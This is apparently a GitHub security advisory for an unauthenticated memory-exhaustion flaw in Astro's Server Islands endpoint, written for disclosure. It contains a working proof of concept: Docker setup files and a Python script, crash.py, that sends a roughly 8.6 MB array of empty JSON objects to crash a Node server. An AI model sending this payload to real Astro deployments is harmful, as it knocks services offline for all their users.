+ "details": "### Summary\n\nAstro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because `JSON.parse()` allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The `/_server-islands/[name]` route is registered on all Astro SSR apps regardless of whether any component uses `server:defer`, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.\n\n### Details\n\nAstro automatically registers a Server Islands route at `/_server-islands/[name]` on all SSR apps, regardless of whether any component uses `server:defer`. The POST handler in `packages/astro/src/core/server-islands/endpoint.ts` buffers the entire request body into memory and parses it as JSON with no size or depth limit:\n\n```js\n// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)\nconst raw = await request.text(); // full body buffered into memory — no size limit\nconst data = JSON.parse(raw); // parsed into V8 object graph — no element count limit\n```\n\nThe request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — `/_server-islands/anything` triggers the vulnerable code path. No authentication is required.\n\nAdditionally, `JSON.parse()` allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., `[{},{},{},...]`) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.\n\n### PoC\n\n**Environment:** Astro 5.18.0, `@astrojs/node` 9.5.4, Node.js 22 with `--max-old-space-size=128`.\n\nThe app does **not** use `server:defer` — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.\n\n**Setup files:**\n\n`package.json`:\n```json\n{\n \"name\": \"poc-server-islands-dos\",\n \"scripts\": {\n \"build\": \"astro build\",\n \"start\": \"node --max-old-space-size=128 dist/server/entry.mjs\"\n },\n \"dependencies\": {\n \"astro\": \"5.18.0\",\n \"@astrojs/node\": \"9.5.4\"\n }\n}\n```\n\n`astro.config.mjs`:\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n output: 'server',\n adapter: node({ mode: 'standalone' }),\n});\n```\n\n`src/pages/index.astro`:\n```astro\n---\n---\n<html>\n<head><title>Astro App</title></head>\n<body>\n <h1>Hello</h1>\n <p>Just a plain SSR page. No server islands.</p>\n</body>\n</html>\n```\n\n`Dockerfile`:\n```dockerfile\nFROM node:22-slim\nWORKDIR /app\nCOPY package.json .\nRUN npm install\nCOPY . .\nRUN npm run build\nEXPOSE 4321\nCMD [\"node\", \"--max-old-space-size=128\", \"dist/server/entry.mjs\"]\n```\n\n`docker-compose.yml`:\n```yaml\nservices:\n astro:\n build: .\n ports:\n - \"4321:4321\"\n deploy:\n resources:\n limits:\n memory: 256m\n```\n\n**Reproduction:**\n\n```bash\n# Build and start\ndocker compose up -d\n\n# Verify server is running\ncurl http://localhost:4321/\n# => 200 OK\n```\n\n`crash.py`:\n```python\nimport requests\n\n# Any path under /_server-islands/ works — no valid island name needed\nTARGET = \"http://localhost:4321/_server-islands/x\"\n\n# 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object\n# 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit\nn = 3_000_000\npayload = '[' + ','.join(['{}'] * n) + ']'\nprint(f\"Payload: {len(payload) / (1024*1024):.1f} MB\")\n\ntry:\n r = requests.post(TARGET, data=payload,\n headers={\"Content-Type\": \"application/json\"}, timeout=30)\n print(f\"Status: {r.status_code}\")\nexcept requests.exceptions.ConnectionError:\n print(\"Server crashed (OOM killed)\")\n```\n\n```\n$ python crash.py\nPayload: 8.6 MB\nServer crashed (OOM killed)\n\n$ curl http://localhost:4321/\ncurl: (7) Failed to connect to localhost port 4321: Connection refused\n\n$ docker compose ps\nNAME IMAGE COMMAND SERVICE CREATED STATUS PORTS\n(empty — container was OOM killed)\n```\n\nThe server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.\n\n### Impact\n\nAny Astro SSR app with the Node standalone adapter is affected — the `/_server-islands/[name]` route is registered by default regardless of whether any component uses `server:defer`. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the `[name]` parameter works because the body is parsed before the name is validated.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments